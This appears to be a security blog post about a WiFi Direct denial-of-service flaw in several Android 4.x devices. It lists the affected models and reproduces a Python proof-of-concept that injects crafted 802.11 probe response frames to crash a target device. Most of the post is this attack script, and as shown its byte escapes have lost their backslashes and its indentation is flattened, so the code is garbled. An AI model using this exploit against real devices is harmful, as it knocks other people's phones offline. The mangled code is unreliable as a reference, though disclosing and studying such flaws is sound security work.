Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs

An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.

Vulnerable Packages include:

. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2

Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the POC example from seclist:

   This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "x50x00"  # Frame Control
frame += "x00x00"  # Duration
frame += destination
frame += source
frame += source
frame += "x00x00"  # Sequence Control
frame += "x00x00x00x00x00x00x00x00"  # Timestamp
frame += "x64x00"  # Beacon Interval
frame += "x30x04"  # Capabilities Information
# SSID IE
frame += "x00"
frame += "x07"
frame += "DIRECT-"
# Supported Rates
frame += "x01"
frame += "x08"
frame += "x8Cx12x98x24xB0x48x60x6C"
# DS Parameter Set
frame += "x03"
frame += "x01"
frame += struct.pack("B", channel)
# P2P
frame += "xDD"
frame += "x27"
frame += "x50x6Fx9A"
frame += "x09"
# P2P Capabilities
frame += "x02" # ID
frame += "x02x00" # Length
frame += "x21x00"
# P2P Device Info
frame += "x0D" # ID
frame += "x1Bx00" # Length
frame += source
frame += "x01x88"
frame += "x00x0Ax00x50xF2x04x00x05"
frame += "x00"
frame += "x10x11"
frame += "x00x06"
frame += "fafaxFAxFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print "  poc.py  "
print "Example:"
print "  poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

Leave a Reply